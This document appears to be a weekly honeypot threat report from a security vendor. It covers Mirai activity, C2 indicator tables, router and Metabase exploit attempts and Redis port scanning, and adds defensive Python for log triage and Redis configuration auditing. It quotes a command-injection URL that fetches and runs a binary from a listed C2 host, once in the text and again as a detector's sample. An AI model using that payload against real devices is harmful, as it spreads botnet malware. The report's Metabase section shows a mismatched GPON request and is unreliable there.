Analysis of the activity observed on TEHTRIS honeypot network in week 39 has revealed new indications of compromise and detected popular types of attacks.
Malicious activity of the Mirai botnet
Again this week, traces of the Mirai malware (whose activity is associated with the “Hello, world” User Agent) emanating from 346 different IP addresses have been observed.
C2 servers used in exploit attempts against MWPower
94% of the requests recorded this week on TEHTRIS honeypots were aimed at exploiting the remote shell command execution vulnerability on MWPower video surveillance recorders, already studied last week. The wget commands in these requests point to 19 malicious servers, 9 of which had been seen previously. The 10 new IoCs are:
| IP / domain name | Country | AS |
| --- | --- | --- |
| chdestruction.cf | .cf (Central African Republic TLD) | This domain name is associated with the Croatian IP address 45.95.169[.]145 (AS 211619 MAXKO j.d.o.o) |
| 85.31.46[.]179 | US | AS 211252 Delis LLC |
| 80.11.88[.]106 | EN | AS 3215 Orange |
| 78.172.126[.]236 | TR | AS 9121 Turk Telekom |
| 46.19.141[.]122 | CN | AS 51852 Private Layer INC |
| 27.41.9[.]81 | CN | AS 17816 China Unicom IP network China169 Guangdong province |
| 175.42.40[.]49 | CN | AS 4837 CHINA UNICOM China169 Backbone |
| 118.199.171[.]77 | CN | AS 4808 China Unicom Beijing Province Network |
| 110.89.10[.]163 | CN | AS 4134 Chinanet |
| 103.83.110[.]85 | IN | AS 134045 Ishan Netsol Pvt Ltd |
| 101.0.55[.]159 | IN | AS 133661 Netplus Broadband Services Private Limited |
Exploit attempts on routers
Apart from requests targeting MWPower devices, attempts to exploit routers through known vulnerabilities have also been observed. For example, the following URLs attempt to exploit:
– CVE-2020-8958 (CVSS3: 7.2), which allows remote code execution on vulnerable NetLink routers:
/boaform/admin/formPing?target_addr=; wget http[:]//46.19.141[.]122/netlink -O -> /tmp/jno;chmod 777 /tmp/jno;sh /tmp/jno'/& waninf=1_INTERNET_R_VID_154$
– A vulnerability in ZyXEL and Billion routers (popular in Thailand) disclosed in 2016 leading to elevation of privilege:
/cgi-bin/ViewLog.asp
– CVE-2018-10561 (CVSS3: 9.8), a vulnerability on Dasan GPON routers that allows an attacker to bypass authentication by appending /images to a URL and gain control over the device:
/GponForm/diag_Form?images/
It should be noted that these attempted attacks are also carried out by malicious actors other than the Mirai malware. TEHTRIS strongly recommends that you always update your devices to be protected against these kinds of known and patched vulnerabilities.
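As an added example (not code from the TEHTRIS report), the following Python triage matches the three router exploit URLs quoted above against honeypot or web-server log lines, decodes the injected wget stage as in the MWPower and NetLink payloads, and checks the download host against a subset of the IoCs listed above. The log line format, the sample lines and the source addresses are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Subset of the IoCs listed above, kept defanged as published and refanged only in memory for matching.
KNOWN_C2_DEFANGED = ["46.19.141[.]122", "85.31.46[.]179", "27.41.9[.]81", "103.83.110[.]85", "chdestruction.cf"]
KNOWN_C2 = {ioc.replace("[.]", ".") for ioc in KNOWN_C2_DEFANGED}

# Request-path signatures for the three router exploit URLs quoted above.
RULES = [
    ("CVE-2020-8958 NetLink formPing command injection", re.compile(r"^/boaform/admin/formPing\?.*target_addr=", re.I)),
    ("ZyXEL/Billion ViewLog.asp", re.compile(r"^/cgi-bin/ViewLog\.asp", re.I)),
    ("CVE-2018-10561 GPON ?images/ auth bypass", re.compile(r"^/GponForm/[^?]*\?images/", re.I)),
]
# Download stage of an injected shell command (wget/curl http://host/...), as in the MWPower and NetLink payloads.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b[^;|&]*?https?://([^/\s;'\"]+)", re.I)
# Assumed log line format: <src ip> "<METHOD> <path> HTTP/x.y" "<user agent>"
LOG_RE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" "([^"]*)"$')

# Constructed sample lines (RFC 5737 source addresses), not TEHTRIS honeypot data.
SAMPLE_LOG = [
    '203.0.113.5 "GET /boaform/admin/formPing?target_addr=;%20wget%20http://46.19.141.122/netlink%20-O%20-%3E%20/tmp/jno;chmod%20777%20/tmp/jno;sh%20/tmp/jno\'/&%20waninf=1_INTERNET_R_VID_154$ HTTP/1.1" "Hello, world"',
    '198.51.100.7 "GET /GponForm/diag_Form?images/ HTTP/1.1" "l9explore/1.3.0"',
    '198.51.100.9 "GET /cgi-bin/ViewLog.asp HTTP/1.1" "curl/7.68.0"',
    '192.0.2.44 "GET /index.html HTTP/1.1" "Mozilla/5.0"',
]

def analyse_line(line):
    """Parse one log line; return a dict of findings, or None if the line does not match LOG_RE."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, raw_path, ua = m.groups()
    path = unquote(raw_path)  # decode %20 etc. before matching, i.e. what the device's shell would see
    hosts = [h.rsplit(":", 1)[0] for h in DOWNLOAD_RE.findall(path)]  # drop an optional :port
    return {
        "src": src,
        "rules": [name for name, rx in RULES if rx.search(path)],
        "download_hosts": hosts,
        "known_c2": sorted(h for h in hosts if h in KNOWN_C2),
        "mirai_ua": ua == "Hello, world",  # User Agent the report associates with Mirai
    }

def triage(lines):
    """Keep only the lines that hit a signature or pull a payload from a known C2."""
    results = (analyse_line(line) for line in lines)
    return [r for r in results if r and (r["rules"] or r["known_c2"])]
```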
Attempt to exploit Metabase
This week, 3 IP addresses of the operator DigitalOcean (AS 14061) were observed attempting to exploit versions of Metabase (an open-source data management platform) vulnerable to CVE-2021-41277 (CVSS3: 7.5), which allows an attacker to access sensitive files on the targeted server.
Request:
URL: /GponForm/diag_Form?images/
User Agent: l9explore/1.3.0
IoC:
| IP | Country | AS |
| --- | --- | --- |
| 161.35.86[.]181 | NL | AS 14061 DIGITALOCEAN-ASN |
| 134.122.112[.]12 | US | |
| 161.35.188[.]242 | US | |
Malicious network activity
Out of all malicious activity on TEHTRIS honeypot network this week, 18% came from IP addresses registered in the United States, 17.21% from IP addresses registered in the Netherlands (mainly from AS 202425 IP Volume inc, mentioned in week 37) and 15.6% from IP addresses registered in China. In addition, 9.1% came from Bulgarian IP addresses, mainly registered at AS 207812 Dm Auto Eood, located in Sofia and registered since 11/20/2019. Very little information is available about it, except that its IP addresses are flagged in public reputation databases for suspicious activity. According to DNSlytics, this Bulgarian AS hosts 9 domains, such as vip-support[.]org and freedom4ua[.]net, and 4 name servers, including ns1.cloud[.]mobi and ns2.vip-support[.]org.
Below are the 10 most active IP addresses in attack attempts on TEHTRIS honeypots:
| IP address | Share of attack attempts | AS | Country |
| --- | --- | --- | --- |
| 89.248.165.68 | 5.174% | AS 202425 IP Volume inc | NL |
| 89.248.165.97 | 4.276% | AS 202425 IP Volume inc | NL |
| 89.248.165.166 | 3.981% | AS 202425 IP Volume inc | NL |
| 79.124.62.82 | 3.754% | AS 207812 Dm Auto Eood | BG |
| 79.124.62.130 | 3.585% | AS 207812 Dm Auto Eood | BG |
| 79.124.62.78 | 3.573% | AS 207812 Dm Auto Eood | BG |
| 79.124.62.86 | 3.465% | AS 207812 Dm Auto Eood | BG |
| 87.246.7.198 | 3.368% | AS 204428 SS-Net | BG |
| 5.8.18.18 | 3.251% | AS 202425 IP Volume inc | MD |
| 89.248.165.17 | 2.949% | AS 202425 IP Volume inc | NL |
In addition, TEHTRIS paid attention to the use of non-standard ports. 13% of events on non-standard ports are TCP requests on port 6379, the default Redis port. Port 6379 is targeted to exploit a vulnerability in Redis instances (a database management system) that allows an unauthenticated attacker to remotely access the instance and execute code: CVE-2022-20821 (CVSS3: 6.5). 70% of the activity observed on port 6379 originated from Chinese IP addresses.
TEHTRIS recommends limiting the exposure of servers using Redis by only allowing streams from legitimate users.
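As an added example, not part of the TEHTRIS report: a small Python audit of a redis.conf that flags the settings which leave an instance reachable and unauthenticated on port 6379, with a constructed weak fragment beside a hardened one. Directive names are assumed from Redis 6+; the ACL check is a rough approximation, since users may also be defined in an aclfile.

```python
# Constructed redis.conf fragments (directive names assumed from Redis 6+); not from the TEHTRIS report.
WEAK_CONF = """\
bind 0.0.0.0          # reachable from every interface
protected-mode no     # and the loopback-only safety net is switched off
port 6379
"""
HARDENED_CONF = """\
bind 127.0.0.1 -::1   # loopback only; use a private address plus firewall rules if clients are remote
protected-mode yes
port 6379
requirepass CHANGE-ME-to-a-long-random-secret
rename-command CONFIG ""
rename-command DEBUG ""
"""

def parse_conf(text):
    """Map each directive to the list of values it was given (directives may repeat)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip trailing comments
        if not line:
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip())
    return conf

def audit_redis_conf(text):
    """Return findings as 'tag: message' strings; an empty list means no exposure issue was found."""
    conf = parse_conf(text)
    findings = []
    # A "-" prefix (Redis 6.2+) only makes the address optional, so ignore it when classifying.
    binds = [addr.lstrip("-") for value in conf.get("bind", []) for addr in value.split()]
    if not binds or any(addr in ("0.0.0.0", "::", "*") for addr in binds):
        findings.append("bind: the instance listens on all interfaces (no bind directive, 0.0.0.0, :: or *)")
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":  # default is yes when absent
        findings.append("protected-mode: disabled, so unauthenticated non-loopback clients are not refused")
    if "requirepass" not in conf and "user" not in conf:  # rough check; ACL users may live in an aclfile
        findings.append("auth: no requirepass and no ACL users, so any client reaching port 6379 has full access")
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append("config: CONFIG command not renamed or disabled")
    return findings
```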